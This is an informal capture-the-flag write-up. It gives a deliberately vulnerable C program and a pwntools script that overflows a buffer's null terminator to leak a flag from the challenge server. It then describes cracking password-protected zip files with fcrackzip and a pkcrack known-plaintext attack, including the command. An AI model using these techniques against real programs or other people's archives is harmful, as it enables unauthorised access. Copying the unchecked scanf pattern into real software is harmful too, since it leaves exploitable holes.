Ctf(x)
This question taught me something new .. i.e There is no boundary stopping you from sucess :)
In this question the buffer was first followed by a int and then flag and stack cannary was enabled i tried too overwrite the argv[0] but no luck the sol was to
Overflow the null byte appended by scanf .. to int and then overwrite that null byte through next input by doing so we ensure that we extend the boundary of our buffer
So '%s' reads our flag too ....
// gcc -o guesslength -m32 guesslength.c
#include
#include
#include
typedef struct {
char input[50]; // ebp-120
int length; // ebp-68
char flag[50]; // ebp-64 // ebp-63
} data;
int main()
{
setbuf(stdout, NULL);
data d;
strncpy(d.flag, "REDACTED", sizeof(d.flag));
printf("Enter your text: ");
scanf("%s", d.input);
printf("Guess the length of this text: ");
scanf("%d", &d.length);
if (strlen(d.input) == d.length) {
printf("You guessed the length correctly. Great job!\n");
} else {
printf("The actual length of '%s' is %ld, not %d. Sorry :(\n", d.input, strlen(d.input), d.length);
}
return 0;
}
from pwn import *
HOST,PORT = "problems.ctfx.io",1338
r=remote(HOST,PORT)
r.sendline("a" * 53) # fill the text buffer, and make the null byte overflow into the int's memory
r.sendline("2147483647") # a large number will ensure that the null byte (which is in the int's memory) is overwritten
print r.recv(4000)
#ctf(hiding_behind_a_null_overwrite)
Ok we were given two Zip files and both are password protected .. so used fcrackzip dict bruteforce one was crackable .. and it contained two files .vcf and a signature
the other zip too contained .vcf and a signature so all we have to do is predict the .vcf of 2nd file using 1st then do a Plain-text attack using pkcrack
./pkcrack -C Ryan\ King.zip -c 'Ryan King.vcf' -P archive.zip -p 'Ryan King.vcf' -d decrypted.zip -a